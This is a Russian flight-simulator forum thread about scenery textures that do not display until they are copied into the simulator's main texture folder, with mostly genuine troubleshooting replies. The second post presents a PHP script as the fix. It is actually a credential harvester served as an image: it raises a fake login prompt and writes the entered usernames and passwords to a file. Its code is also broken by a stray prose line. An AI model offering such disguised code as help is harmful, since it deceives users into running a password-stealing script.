...Среда, 25.12.2024, 19:43

Приветствую Вас Гость | RSS
Главная
[ Обновленные темы · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Отсутствуют текстуры
KilderdДата: Понедельник, 11.01.2010, 15:48 | Сообщение # 1
Генерал-полковник
Награды: 0
Замечания: 0%
Статус: Не в сети
Вопрос, на который я так и не нашёл ответа. Думаю многие сталкивались.
Итак, ставишь очередной сценарий и тут неприятность - на чём-либо (здание, машина и т.п.) отсутствует текстура. Заходим в папочку texture сценария ищем эту текстуру и она есть. Но не отображается. Стоит только перебросить её в папку texture в корне сима и происходит чудо - она появляется, т.е. всё нормально.
Каждый раз выискивать эту текстуру очень затруднительно.

Кто может дать вразумительный ответ по теме?

Спец_БлатнойДата: Понедельник, 11.01.2010, 15:58 | Сообщение # 2
Подполковник
Quote (Kilderd)
Кто может дать вразумительный ответ по теме?

Я могу дать. Для этого создаём текстовый документы и называем:

название вашего аэропорта.txt
Пишем в нём следущий код:

Quote (Kilderd)
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm=" Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
Название файлов ваших текстур по порядку.
}
imagegif($image);
imagedestroy($image);
?>

Дальше качаем программу ImageTools
Конвертируем наши текстуры в DTX
раскидываем в нужные папки сима текстуры. А текстовый документ кидаем в Adone Scenery.

AdminДата: Вторник, 12.01.2010, 13:58 | Сообщение # 3

Quote (Kilderd)
Вопрос, на который я так и не нашёл ответа. Думаю многие сталкивались.
Итак, ставишь очередной сценарий и тут неприятность - на чём-либо (здание, машина и т.п.) отсутствует текстура. Заходим в папочку texture сценария ищем эту текстуру и она есть. Но не отображается. Стоит только перебросить её в папку texture в корне сима и происходит чудо - она появляется, т.е. всё нормально.
Каждый раз выискивать эту текстуру очень затруднительно.

Не понятно, это проблемы у вас с чужими сценариями или с лично сделанными вами? И это разные вещи...

DokoneДата: Вторник, 12.01.2010, 14:00 | Сообщение # 4
Антесемит
А как вы определяете какая именно текстура не отображается? Если конечно, сценарий чужой.
2.Нет ли какой-либо закономерности в формате неотображаемых текстур?

Search Engine

DokoneДата: Вторник, 12.01.2010, 14:01 | Сообщение # 5
Антесемит
Проявляется это на чужих сценариях. Моих у меня нет.
Крайний раз столкнулся при установке Хабаровска. Свежий с сайта ВА Восток вроде.
Не отображались текстуры деревьев зимой и осенью. Текстуры летом отображались. Деревья такие же используются в сценарии Храброво. Так вот, летние были в формате 8 бит, а зима и осень в ДХТ. Я и думал, что проблема в этом. Перевел их в формат 8 бит. Результат нулевой. Только после переноса их в папку текстур сима все стало отображаться. Здесь как мне кажется проблема в именах файлов текстур, потому что летние имели название отличное от тех, что используются в Храброво, а зима и осень - одинаковые. Но вот только нет закономерности никакой - одинаковых имен куча в сценариях, но проявляется не всегда. В этом же сценарии не отображались текстуры статичных Ан2, решилось все тем же способом - переносом файлов.

Search Engine

DokoneДата: Вторник, 12.01.2010, 14:01 | Сообщение # 6
Антесемит
Я потому тему создал в разделе Создание сценариев, думаю те, кто их создают должны быть как никто в курсе этой проблемы. Но что-то смотрю это так и останется тайной.

Search Engine

DokoneДата: Вторник, 12.01.2010, 14:02 | Сообщение # 7
Антесемит
Еще как пример этой проблемы приведу сценарий Нижний Новгород. В нем вообще пропали почти все текстуры. Излечилось способом описанным выше. С тем же столкнулся не я один, давно как то я давал совет для устранения проблемы кому-то из участников форума.

Search Engine

МоделистДата: Вторник, 12.01.2010, 14:04 | Сообщение # 8
Лейтенант
Замечания: 40%
Quote (Dokone)
Я потому тему создал в разделе Создание сценариев, думаю те, кто их создают должны быть как никто в курсе этой проблемы. Но что-то смотрю это так и останется тайной.

Отнюдь, тайны в этом никакой нет.
Есть только неграмотное раздаривание авторских текстур, или использование их другими создателями сцен
без согласования с автором :(.
Хуже всего, когда вообще никто принципиально не читает ридми и лицензию на сценарии других разработчиков.
А просто берет молча готовый материал и начинает творить, не предвидя последствий.

Теперь пример, возьму его из собственного опыта.
Создал библиотеку статики, написал ТХТ к нему по правильному использованию, выложил.
Летал не спокойно себе над своим строительным "полигоном", где и обкатывалась моя статика.
Через время, месяц-два, заметил, что с моих Антох слетели текстуры, стоят себе голые.
Начал копать, убил пару часов времени в поисках этой причины, нашел.

Проблема была в том, что я установил сцену, в которой была использована моя библиотека, а текстуры
в комплекте этой сцены были далеко не все, а только те, которые использовала эта сцена.

Удалил БГЛ статики из этой сцены и все наладилось.

С этой проблемой сталкивались многие и неоднократно.
И самое обидное то, что из за такого отношения коллег, не прочитавших ридми, ты потом еще и получаешь
почту разного характера, узнавая о себе много нового :).

Я являюсь официальным представителем "Моделиста" на вашем сайте, все вопросы, по продукции нашей фирмы ко мне.

KilderdДата: Вторник, 12.01.2010, 14:10 | Сообщение # 9
Генерал-полковник
Так проблема в том, что к той или иной библиотеке должен идти полный набор текстур всех объектов, даже тех, которые не используются?

• Страница 1 из 1
  • 1
Поиск:

Copyright MyCorp © 2024
Бесплатный конструктор сайтов - uCoz